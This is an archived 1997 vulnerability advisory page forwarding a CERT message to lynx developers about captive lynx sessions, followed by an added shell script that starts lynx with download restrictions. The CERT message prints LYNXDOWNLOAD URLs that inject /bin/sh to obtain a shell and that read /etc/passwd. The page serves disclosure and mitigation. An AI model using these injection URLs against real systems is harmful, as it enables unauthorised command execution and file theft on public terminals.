Obtain an interactive shell through lynx

Summary

Description: It is possible to obtain an interactive shell via special LYNXDOWNLOAD URLs. This is a big security hole for sites that use lynx "guest accounts" and other public services.
Author: Unknown
Compromise: Run unauthorized arbitrary commands
Vulnerable Systems: Sites trying to keep visitors captive in a lynx session.
Date: 23 June 1997
Details


Date: Thu, 17 Jul 1997 16:42:22 -0000
From: brush@SEARCH.POL.PL
To: BUGTRAQ@NETSPACE.ORG
Subject: msg00234.html

LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)


     * To: Lynx Development <lynx-dev@sig.net>
     * Subject: LYNX-DEV VU#5135 (Lynx vulnerability?) (fwd)
     * From: Duncan Hill <dhill@sunbeach.net>
     * Date: Tue, 24 Jun 1997 07:56:04 +0400 (GMT-4)
     * cc: Roger Hill <rhill@stobyn.ml.org>
     * Reply-To: lynx-dev@sig.net
     * Sender: owner-lynx-dev@quartz.netop.sig.net

I'm not sure if the entire list got this.  I got it because I'm still
subscribed to the raven list :)  So, here it is in case nobody's seen
it yet.

Duncan Hill
------------------------------------------------------------------------------

---------- Forwarded message ----------
Date: Mon, 23 Jun 1997 17:52:06 -0400 (EDT)
From: "CERT(sm) Coordination Center" <cert@cert.org>
To: Lynx Developers <lynx-dev@raven.cc.ukans.edu>
Cc: "CERT(sm) Coordination Center" <cert@cert.org>
Subject: VU#5135 (Lynx vulnerability?)

-----BEGIN PGP SIGNED MESSAGE-----

Hello folks,

We have received a report of a potential vulnerability with lynx, which we
wanted to check with you on.

When you start up a lynx client session, you can hit "g" (for Goto) and
then enter the following URL:

        URL to open: LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh;/SugFile=/dev/null
        Enter a filename: /dev/null
        File exists. Overwrite? (y/n) y

This then gives a shell on the client machine on which the lynx process is
executing.


Similarly, you can copy and inspect arbitrary files on the local system
thus:

        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdout
        Enter a filename: /dev/stdout
        File exists. Overwrite? (y/n) y

This returns a copy of the /etc/passwd file to the user's browser
session.

Normally this may not be a problem if you are executing lynx from your
local account on your workstation.

However, if you are running lynx as a captive information service (as
discussed on the lynx man page), then this means that an attacker can run
arbitrary commands and inspect arbitrary files on the victim system without
authorization.

We are aware of one site where you can telnet to the system, and without
any authentication process, the user is given a lynx browser session.  By
entering the URL above, an attacker would then be able to obtain an
interactive shell on that system without having been authenticated.

We would be interested in knowing whether this is a known problem.  The
reporter suggested that disabling downloads would be an appropriate
workaround.  If you are in agreement with this, is this a feature that is
enabled by default?  (This would require the captive session to be started
using the "-restrictions=download" option, wouldn't it?)

If this is a known problem, have you any suggestions as to the solution, or
any idea whether patches are (or would be) available to address these
problems?

We would appreciate any feedback that you may have on these questions.
Thanks very much for your time.

Regards,
Rob.

| Rob McMillan                          Email:     cert@cert.org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM67vzXVP+x0t4w7BAQGFjQP9FEqS0OicRpyWTzd6e9MHj26XBWWfb9Kw
izdrbMhkH/KOYnUF1Cq+1QeIb0DbeipBNTVJLXFRBoT0Ztk+e5loH+Ggr8zRU/sn
dH9R2fS88F0XWtX7MXvFuiVIq5EtkoPXZc59FvvTC45qWub7+m5wW8Gb1wOvfXIs
tT1YSXP1vxE=
=86zo
-----END PGP SIGNATURE-----
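The workaround the CERT message asks about (starting the captive session with the "-restrictions=download" option) as an added example; this is not code from the message, from CERT or from the lynx project. It is a small POSIX sh launcher that builds the captive command line with the download restriction, plus an audit helper that checks any lynx command line (for instance the one an inetd or telnet wrapper already uses) for such a restriction. The restriction names goto, shell and exec, the -anonymous switch and the "all" keyword are assumed here: they are documented lynx options but do not appear on the page. The start URL and the script name launcher.sh are constructed placeholders.

```shell
#!/bin/sh
# Added example (not part of the CERT message or the lynx project): a launcher
# for a captive/guest lynx session that applies the restriction the reporter
# proposed (-restrictions=download), plus an audit helper that checks whether
# a given lynx command line carries a download restriction.
# Assumptions: lynx accepts -restrictions=<name,...> with "download", "all",
# "goto", "shell" and "exec" as names, and the -anonymous switch. Only
# "download" appears on the page; the others are assumed documented options.

# Return 0 if the command line in $1 restricts downloads, 1 otherwise.
lynx_restricts_download() {
    cmdline=$1
    # Split on whitespace and inspect each argument.
    for arg in $cmdline; do
        case $arg in
            -anonymous) return 0 ;;
            -restrictions=*)
                names=${arg#-restrictions=}
                # Walk the comma-separated list; "all" or "download" both qualify.
                oldifs=$IFS; IFS=,
                for name in $names; do
                    case $name in
                        all|download) IFS=$oldifs; return 0 ;;
                    esac
                done
                IFS=$oldifs
                ;;
        esac
    done
    return 1
}

# Build the captive-session command line. The default start URL is a
# constructed placeholder; a real deployment points at its own front page.
captive_lynx_cmdline() {
    start_url=${1:-http://localhost/welcome.html}
    # download: closes the LYNXDOWNLOAD path described in the report.
    # goto,shell,exec: assumed restriction names that keep the user in-page.
    printf '%s\n' "lynx -restrictions=download,goto,shell,exec $start_url"
}

# Only exec lynx when invoked with the "run" argument, so the helpers above
# can be sourced and checked on a host without lynx installed.
if [ "${1:-}" = run ]; then
    shift
    cmd=$(captive_lynx_cmdline "$@")
    lynx_restricts_download "$cmd" || { echo "refusing unrestricted session" >&2; exit 1; }
    exec $cmd
fi
```

Run it as "sh launcher.sh run http://your-site/" to start a session; sourcing it instead (". ./launcher.sh") exposes the two helpers so an existing wrapper's command line can be checked with lynx_restricts_download before it is deployed. The launcher refuses to start if its own command line somehow lacks the restriction, which guards against the option being edited out later.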



This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap.